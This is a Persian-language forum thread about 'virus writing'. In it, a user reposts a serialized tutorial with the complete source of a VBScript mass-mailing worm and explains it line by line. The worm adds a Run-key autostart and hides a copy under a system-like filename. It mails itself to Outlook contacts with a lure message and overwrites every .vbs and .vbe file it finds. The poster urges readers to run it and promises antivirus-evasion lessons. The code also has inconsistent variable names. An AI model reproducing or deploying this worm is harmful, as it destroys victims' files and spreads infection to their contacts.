تبلیغات :
ماهان سرور
آکوستیک ، فوم شانه تخم مرغی ، پنل صداگیر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]

صفحه 13 از 17 اولاول ... 391011121314151617 آخرآخر
نمايش نتايج 121 به 130 از 169

نام تاپيک: ويروس نويسي و انتي ويروس نويسي

اگه نباشه جاش خالی می مونه BabyBoy's Avatar
    تاريخ عضويت
    Jun 2006
    محل سكونت
    bed

1

قول یه ویروس باحال هم بهتون میدم یه زره کارش مونده.
    امیدوارم تا قبل از کنکور تمومش کنم.
    اگه کسی بتونه درمورد انتشار ویروسها هم توی اینترنت و ... مطلب بدردبخوری بده ممنون میشم (البته نه چیزی که تو وبلاگها نوشته شده چون مشه گفت همه رو خوندم)

این تاپیک هم خراب نکنید .بزارید بیشتر سوال و جواب باشه نه کلکل و چرت و پرت
    اگه خیلی به اینجور بحث ها علاقه دارید یه برنامه به اسمه Yahoo! Messenger ساخته شده که خیلی میتونه کمکتون کنه.
    Last edited by BabyBoy; 08-05-2007 at 20:34.

پروفشنال double_n's Avatar
    تاريخ عضويت
    Apr 2005
    محل سكونت
    the Shire

پيش فرض

---------------- ویرایش شده توسط خودم --------------------

قربونت برم آراز جون که مقالاتت رو همه جا به اسم خودشون کپی می کنن

یکی از مدیران Delete بفرمایند

راستی - شما مدیری؟
    Last edited by double_n; 10-05-2007 at 21:17.

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

بابا شما چتونه؟ خوب اینکه معلومه که اینارو خودم ننوشتم. خوب معلومه که از يه جايه ديگه گرفتم. ميخواستم به بقيه کسايی که اینارو نخوندن کمک کنم . اگر شما اینارو خوندين خوب بهشون هم کاری نداشته باشين.

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

قربونت برم آراز جون که مقالاتت رو همه جا به اسم خودشون کپی می کنن

یکی از مدیران Delete بفرمایند
    خيلی گنگ حرف زدی.!! يعنی اینارو تو نوشتی؟ خوب اصلا به من چه. هرکی ميخواد نوشته باشه. من فقط خواستم اینارو به بقيه هم بدم

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

سلام بچه ها. امروز ديگه روز شماست, چون من ديگه از ياد دادن مطالب تئوری خسته شدم و ديگه می خوام شروع کنم. سيستم آموزش من‌ ــکه خودم هم همين طوری ياد گرفتم ــ به اين صورته که اول کد کامل ويروس رو می نويسم و بعد در مورد هر بخش اون به طور جداگانه توضيح می دم. البته هنوز چندتا مطلب ديگه در مورد ActiveX مونده بود ولی ديگه از خيرش گذشتيم. خوب کد يه ويروس نسبتا ساده VbScript به صورته زيره:

Dim Fso
    Set Fso = CreateObject("Scripting.FileSystemObject")
    WinDir = Fso.GetSpecialFolder(0)
    VriPth = WinDir & "\COMDLG32.OCX.vbs"
    Set WsShll = CreateObject("WScript.Shell")
    WsShll.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\COMDLG32", "wscript.exe " & VriPth & " %"
    Fso.CopyFile WScript.ScriptFullName, VriPath
    Mailer()
    Infecter()
    'The Most Important Function ;-)
    Function Mailer()
    Dim AddressList, AdressLists, AddressEnteries
    Set myOlApp = CreateObject("Outlook.Application")
    Set myNameSpace = myOlApp.GetNameSpace("MAPI")
    Set AddressLists = myNameSpace.AddressLists
    For each Addresslist in AddressLists
    Set AddressEntries = AddressList.AddressEntries
    if AddressList.AddressEntries.Count <> 0 then
    msgbox AddressList.AddressEntries.Count
    For Num = 1 To 2
    Set NewMail = myOlApp.CreateItem(0)
    Set AddressEntery = AddressList.AddressEntries.Item(Num)
    NewMail.To = AddressEntery.Address
    NewMail.Subject = "Do U like War ?!!!"
    NewMail.Body = "Hi "+ AddressEntery.Name + Chr(13) +" Veiw the Pics that I have Send u"
    NewMail.Attachments.Add WScript.ScriptFullName
    NewMail.DeleteAfterSubmit = True
    If NewMail.To <> "" Then
    NewMail.Send
    End If
    Next
    End if
    next
    End Function
    'The Infecter Function
    Function Infecter()
    Set Drives = Fso.Drives
    For Each Drive in Drives
    If Drive.IsReady Then
    DoSearch(Drive)
    End if
    Next
    End Function
    'The DoSearch Function
    Function DoSearch(Path)
    Set Folder = Fso.GetFolder(Path)
    Set Files = Folder.Files
    For Each File in Files
    If Fso.GetExtensionName(File.Path) = "vbs" Then
    Checker(File.path,true)
    End if
    If Fso.GetExtensionName(File.Path) = "vbe" Then
    Checker(File.path,true)
    End if
    Next
    Set SubFs = Folder.SubFolders
    For Each SubF in SubFs
    DoSearch(Subf)
    Next
    End Function
    Function Checker(Path)
    Set VbFile = Fso.OpenTextFile(Path, 1, False)
    VbText = VbFile.ReadAll
    IsThere = InStr(1, VbText, MyText, 1)
    If IsThere = 0 Then
    Fso.CopyFile WScript.ScriptFullName, Path, True
    End If
    End Function

خوب با اين کد چی کار بايد کرد. شما می تونيد برای امتحان اينها رو در يه فايل با پسوند "vbs" ذخيره کنيد و ديگه کار تمومه. فقط کافيه روش کليک کنيد!. البته اگر يه ويروس ياب روی سيستمتون نصب باشه ممکنه سريعا بهش گيربده و نذاره شما اونو ذخيره کنيد. ولی من در مقالات بعدی طريقه مخفی کردن ويروس از چشم ضد ويروس هارو هم آموزش می دم پس زياد نگران نباشيد. و حالا نوبت ميرسه به توضيح بخش به بخش ويروس!!!!!
    Dim Fso
    Set Fso = CreateObject("Scripting.FileSystemObject")
    WinDir = Fso.GetSpecialFolder(0)
    VriPth = WinDir & "\COMDLG32.OCX.vbs"
    از همين خط اول شروع می کنم! از Dim در VbScript برای... اه پس من اين سايت جديدم رو برای چی درست کردم خوب بيا بروتوش اول نکات ابتدايی VbScript مثل اعلان متغيرها و... رو ياد بگير بعد بيا از همين جا شروع کن (البته می تونی هم اينکارو نکنی بستگی داره به ضريب هوشی خودت ديگه که اينايی رو که من ميگم بگيری يا نه!). [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] . ديگه ماگفتيم! خوب خط بعدی همونطور که قبلا گفتم برای تعريف شئ File System Object هستش (که در اصل در VbScript برای استفاده از ActiveX ها از تابع ()CreateObject استفاده ميشه). خوب پس الان يه متغير جديد داريم که اون رو با يک شئ FSO مقدار دهی کرديم. در خط بعد از يکی از متدهای اين شئ بنام ()GetSpecialFolder استفاده شده. در اصل از اين متد برای بدست آوردن شاخه های اصلی ويندوز مثل System و يا خود شاخه ويندوز از اون استفاده ميشه. در اين متد بايد يه عدد رو به عنوان مقدار اوليه وارد کنيد (مقدار داخل پرانتز)‌که در اينجا صفر هستش که با وارد کردن اين مقدار تابع شاخه ويندوز را باز ميگرداند که در اينجا اين مقدار رشته ای باز گردانده شده در متغير WinDir قرار می گيرد. در VbScript با استفاده از علامت & و يا + می توان رشته ها را به هم الحاق داد. در خط بعد نيز متغيری بنام VriPth معرفی کرده ايم و آن را با رشته ای که برابر با مجموع دو رشته WinDir و "\COMDLG32.OCX.vbs" مقدار دهی کرده ايم. برای مثال اگر شاخه ويندوز شما به صورت "C:\Windows" در درايو سی قرار داشته باشد در دستور قبلی اين مقدار در متغيير WinDir قرار می گيرد و در اين خط نيز اين دورشته يعنی "C:\Windows" و "\COMDLG32.OCX.vbs" به يکديگر متصل می شوند و مقداری رشته ای برابر "C:\Window\COMDLG.OCX.vbs" در متغير Vripth قرار می گيرد. اين رشته در اصل همان مسيری است که ما می خواهيم يک نسخه از ويروسمان را با نام COMDLG32.OCX.vbs در کپی کنيم. شايد برای شما سوال پيش بياد که چرا می خواهيم نام فايل رو تغير بديم اونم به اين شکل. جواب اينکه شما اصلا می تونيد اين کار رو نکنيد و لی همين باعث می شه که اگر کاربر (قربانی) احتمالا اين فايل رو در شاخه ويندوز خودش ديد نگه من اصلا فايلی با اين اسم ندارم (اسمی که ممکنه شما مثلا خودتون انتخاب کنبد مثل amirviri.vbs)‌ اما اين نامی که من انتخاب کردم يکم گول زننده هستش و شبيه اسم يکی از فايل های اصلی ويندوز هست و ممکنه طرف بی خيال بشه. پس شما هم يکم هوشتون رو بکار بندازيد. خوب ديگه فکر کنم برای امروز بس باشه.بقيه شو فردا ياد می دم. بای

مدیر انجمن برنامه نویسی Payman_62's Avatar
    تاريخ عضويت
    Dec 2005
    محل سكونت
    تهران

پيش فرض

سلام.
    mazi_z_MCSD این مطالبی که نوشتی چه ربطی به ویروس نویسی با ویبی داره؟
    این جا انجمن ویبیه نه هک. هر مطلبی که تو هر وبلاگی پیدا میکنی که نباید این جا کپی پیست کنی.

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

سلام.
    mazi_z_MCSD این مطالبی که نوشتی چه ربطی به ویروس نویسی با ویبی داره؟
    این جا انجمن ویبیه نه هک. هر مطلبی که تو هر وبلاگی پیدا میکنی که نباید این جا کپی پیست کنی.
    قربونت بشم منم ميدونم . اینا هم ويروس نويسی در وی بی رو ياد ميدن

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

ويروس های VbScript (قسمت پنجم)

سلام. امروز می خوام قسمت پنجم از سری مقلات "ويروس های VbScript" رو داشته باشم. فقط خداکنه مطالب قبلی يادتون نرفته باشه اگرم يادتون رفته فقط کافيه يه نگاه به اين مقلات قبلی بندازيد و بعد شروع کنيد‌ (منتظر بوديد من بگم نه؟). خوب در قسمت قبلی يعنی قسمت چهارم, کد کامل يه ويروس VbScript رو نوشتم و سه چهار خط اولش رو توضيح دادم. امروز هم می خوام چند خط بعدی رو توضيح بدم:

WsShll.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\COMDLG32", "wscript.exe " & VriPth & " %"
    Fso.CopyFile Script.ScriptFullName,VriPathخوب کاربرد و نحوه استفاده شئ "WScript.Shell" رو که يه جورايی در قسمت سوم همين مقالات توضيح دادم و اينجا فقط برای يادآوری می گم در خط اول بااستفاده از تابع CreateObject يک شئ Shell تعريف می کنيم. در خط دوم از يکی از متدهای همين شئ بنام RegWrite استفاده شده. همونطور که از اسمش پيداست تابعی برای نوشتن مقادير در رجيستری می باشه و ما در ويروس خودمون برای اجرای ويروس در هر بار راه اندازی ويندوز احتياج به نوشتن مقادير جديد در رجيستری داريم. اين تابع دو مقدار ورودی داره (در VbScript برای جداکردن اين مقادير از هم از علامت " , " استفاده می شه), مقدار اول شاخه ای از رجيستری هستش که ما قصد داريم مقدار جديد رو در اون بنويسيم و مقدار دوم همون مقداره می باشد. که هر دوی اين ها مقادير رشته ای (يعنی رشته ای از حروف) هستند. در اين تابع ما برای ورودی اول مقدار رشته ای "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Run\COMDLG32" رو وارد کرديم. مقاديری که در اين شاخه Run رجيستری قرار می گيرند, در هربار راه اندازی ويندوز اجرا می شوند و ما از اين ترفند استفاده کرده ايم. در ورودی دوم مقدار "wscript.exe " & VriPth & " %" را قرار داده ايم. همونطور که در قسمت چهارم (قبلی)‌ توضيح دادم متغير VriPth حاوی آدرس فايلی هست که ما در اون قصد داريم يه کپی از ويروس خدومون رو قرار بديم (اين عمل در خط بعد انجام می گيره). البته برای اجرای فايل های vbs به صورت خط فرمان احتياج هست که دو مقدار رشته ای "wscript.exe " و " %" رو به اول و آخر آدرس فايل اضافه کنيم که در بالا هم اين کار انجام شده (اگه اين قسمت رو متوجه نشدی بگو!).در خط بعدی از يکی از متدهای شئ FSO (در قسمت دوم يا سوم توضيح دادم) بنام CopyFile استفاده شده. اين متد هم همونطور که از اسمش پيداست برای کپی کردن يک فايل در يه مسير ديگه استفاده می شه. که مثل تابع قبلی دو مقدار ورودی داره. اولی مسير فايل مبدا و دومی مسير فايل مقصد. در VbScript برای بدست آوردن مسير خود فايل vbs ( در اينجا يعنی همون مسيری که برای اولين بار ويروسمون رو اجرا می کنيم) از يکی از متدهای شئ جديدی بنام Script استفاده می شه. هيچ توضيحی برای اين شی لازم نيست چون در اينجا ما فقط با همين يه متد اون يعنی ScriptFullName کار داريم. پس برای مسير فايل مبدا که ويروس خودمون باشه مقدار Script.ScriptFullName (همون مسير رو بر ميگردونه) رو قرار می ديم و برای فايل مقصد هم که ورودی دوم هست متغير VriPth (در قسمت قبل مقاله توضيح دادم که چطور اين متغير را با آدرس فايلی در شاخه ويندوز مقدار دهی کنيم) رو قرار می ديم. پس طبق اين دو خط کد بالا يه کپی از فايل ويروس ما در شاخه ويندوز سيستم فرد قربانی بوجود مياد و آدرس اين کپی رو در شاخه مخصوصی از رجيستری قرار می ديم تا در هر بار راه اندازی ويندوز اجرا بشه. خوب ديگه داره خيلی بلند و بالا می شه و اين برای چشماتون ضرر داره پس بقيشو تو مقالات بعدی می گم. در ضمن اگر تاحالا قسمت های قبلی رو نخونديدسريعا همين امروز اين کار رو بکنيد چون همين امروز فردا ميرن تو آرشيو. / تا فردا يا حق!

پروفشنال majj's Avatar
    تاريخ عضويت
    Sep 2006

پيش فرض

ويروس های VbScript (قسمت پنجم)

سلام. امروز می خوام قسمت پنجم از سری مقلات "ويروس های VbScript" رو داشته باشم. فقط خداکنه مطالب قبلی يادتون نرفته باشه اگرم يادتون رفته فقط کافيه يه نگاه به اين مقلات قبلی بندازيد و بعد شروع کنيد‌ (منتظر بوديد من بگم نه؟). خوب در قسمت قبلی يعنی قسمت چهارم, کد کامل يه ويروس VbScript رو نوشتم و سه چهار خط اولش رو توضيح دادم. امروز هم می خوام چند خط بعدی رو توضيح بدم:

Fso.CopyFile Script.ScriptFullName,VriPathخوب کاربرد و نحوه استفاده شئ "WScript.Shell" رو که يه جورايی در قسمت سوم همين مقالات توضيح دادم و اينجا فقط برای يادآوری می گم در خط اول بااستفاده از تابع CreateObject يک شئ Shell تعريف می کنيم. در خط دوم از يکی از متدهای همين شئ بنام RegWrite استفاده شده. همونطور که از اسمش پيداست تابعی برای نوشتن مقادير در رجيستری می باشه و ما در ويروس خودمون برای اجرای ويروس در هر بار راه اندازی ويندوز احتياج به نوشتن مقادير جديد در رجيستری داريم. اين تابع دو مقدار ورودی داره (در VbScript برای جداکردن اين مقادير از هم از علامت " , " استفاده می شه), مقدار اول شاخه ای از رجيستری هستش که ما قصد داريم مقدار جديد رو در اون بنويسيم و مقدار دوم همون مقداره می باشد. که هر دوی اين ها مقادير رشته ای (يعنی رشته ای از حروف) هستند. در اين تابع ما برای ورودی اول مقدار رشته ای "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Run\COMDLG32" رو وارد کرديم. مقاديری که در اين شاخه Run رجيستری قرار می گيرند, در هربار راه اندازی ويندوز اجرا می شوند و ما از اين ترفند استفاده کرده ايم. در ورودی دوم مقدار "wscript.exe " & VriPth & " %" را قرار داده ايم. همونطور که در قسمت چهارم (قبلی)‌ توضيح دادم متغير VriPth حاوی آدرس فايلی هست که ما در اون قصد داريم يه کپی از ويروس خدومون رو قرار بديم (اين عمل در خط بعد انجام می گيره). البته برای اجرای فايل های vbs به صورت خط فرمان احتياج هست که دو مقدار رشته ای "wscript.exe " و " %" رو به اول و آخر آدرس فايل اضافه کنيم که در بالا هم اين کار انجام شده (اگه اين قسمت رو متوجه نشدی بگو!).در خط بعدی از يکی از متدهای شئ FSO (در قسمت دوم يا سوم توضيح دادم) بنام CopyFile استفاده شده. اين متد هم همونطور که از اسمش پيداست برای کپی کردن يک فايل در يه مسير ديگه استفاده می شه. که مثل تابع قبلی دو مقدار ورودی داره. اولی مسير فايل مبدا و دومی مسير فايل مقصد. در VbScript برای بدست آوردن مسير خود فايل vbs ( در اينجا يعنی همون مسيری که برای اولين بار ويروسمون رو اجرا می کنيم) از يکی از متدهای شئ جديدی بنام Script استفاده می شه. هيچ توضيحی برای اين شی لازم نيست چون در اينجا ما فقط با همين يه متد اون يعنی ScriptFullName کار داريم. پس برای مسير فايل مبدا که ويروس خودمون باشه مقدار Script.ScriptFullName (همون مسير رو بر ميگردونه) رو قرار می ديم و برای فايل مقصد هم که ورودی دوم هست متغير VriPth (در قسمت قبل مقاله توضيح دادم که چطور اين متغير را با آدرس فايلی در شاخه ويندوز مقدار دهی کنيم) رو قرار می ديم. پس طبق اين دو خط کد بالا يه کپی از فايل ويروس ما در شاخه ويندوز سيستم فرد قربانی بوجود مياد و آدرس اين کپی رو در شاخه مخصوصی از رجيستری قرار می ديم تا در هر بار راه اندازی ويندوز اجرا بشه. خوب ديگه داره خيلی بلند و بالا می شه و اين برای چشماتون ضرر داره پس بقيشو تو مقالات بعدی می گم. در ضمن اگر تاحالا قسمت های قبلی رو نخونديدسريعا همين امروز اين کار رو بکنيد چون همين امروز فردا ميرن تو آرشيو. / تا فردا يا حق!
    پس بقیش کو

Banned
    تاريخ عضويت
    Mar 2007
    محل سكونت
    Forum.p30world

پيش فرض

بابا خب واستا. هنوز بقيشو درست نخوندی منتظر بعدی هستی؟

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

قوانين ايجاد تاپيک در انجمن

• شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •